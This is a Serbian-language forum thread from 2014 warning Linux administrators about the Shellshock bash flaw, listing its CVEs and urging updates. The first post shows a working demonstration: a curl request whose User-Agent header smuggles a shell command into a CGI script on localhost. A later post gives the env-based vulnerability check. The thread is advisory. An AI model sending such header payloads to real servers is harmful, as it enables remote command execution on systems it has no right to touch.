Shellsock - bash remote code execution

Shellsock - bash remote code execution

offline
  • Pridružio: 26 Avg 2005
  • Poruke: 384
  • Gde živiš: Beograd

Samo malo obavestenje za sve Linux admine juce je otkriveno da su sve verzije bash-a ranjive. Update jako preporucljiv.
Vise info-a
https://securityblog.redhat.com/2014/09/24/bash-sp.....on-attack/
random primer sa neta:


[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
offline
  • Pridružio: 17 Jan 2014
  • Poruke: 551

Napisano: 26 Sep 2014 14:20

pogodjeni su i osx i uniix systemi sa ovim
kod ubuntu-a (svih verzija) fix ce biti implementiran putem redovnog update-a
inace, ova "rupa" je prisutna vec duzi niz godina ali opet je tesko koristiti dati propust jer korisnik sam mora da napravi fajl u /var folderu

Dopuna: 28 Sep 2014 8:55

test komanda za proveru je:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
postoje 4 ranjivost koje su javne i jedna koja se tek utvrdjuje.
CVE-2014-6271
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187

CVE-2014-6277

detaljniji test vrsi skripta:
script by hannob

ne bi bilo lose da OP promeni naziv teme u #shellsock ili #bashbug



offline
  • bocke  Male
  • Moderator foruma
  • Glavni moderator Linux foruma
  • Veliki Pingvin
  • Guru
  • Pridružio: 16 Dec 2005
  • Poruke: 12140
  • Gde živiš: Južni pol

Pošto imamo forum koji se malo ozbiljnije bavi propustima, premeštam temu tamo.

Ko je trenutno na forumu
 

Ukupno su 930 korisnika na forumu :: 85 registrovanih, 8 sakrivenih i 837 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 1567 - dana 15 Jul 2016 19:18

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: _Sale, aBobban, Acid_Burn, AleksSE, Alojz Hauptman, amir3045, anamilanovic.1000, Arhiv, Blue, Branko GM, chester_perry, Cipelica~, cojapop, Cranium, Crvena Petokraka, davidmihailovic2004, DeerHunter, dencorr, dexter300, djboj, djukapfc, Dok2015, dolinalima2, Dorcolac, dragon986, dragonserbia, drdoca, Drug Platov, Drug pukovnik, Dusko Nikolin, duxhm, dzenan_y, Faki-Valjevo, flash12, galijot, Gama, Georgius, hatman, ivan979, jery, koli2, komkom, kosticmilanko, Kotarle, kovac9mm, Kruger2, Lucije Kvint, LUDI, maiden6657, Maksim 3, mali15, manda87, Markoni958, marsovac 2, Mercury, mgaji21, mikrimaus2, Miskohd, nenad812, NiNo_8824, renoje2, robertino, roka79, royst33, S-lash, sakota79, Sale.S, shone34, slonic_tonic, srbi, srecko81, ssekir75, StepskiVuk, svarun, theNedjeljko, ujkozavlanje, VJ, Vl veliki, voja64, Wrangler, xandar, yrraf, Zerajic, zlatkoa987, 31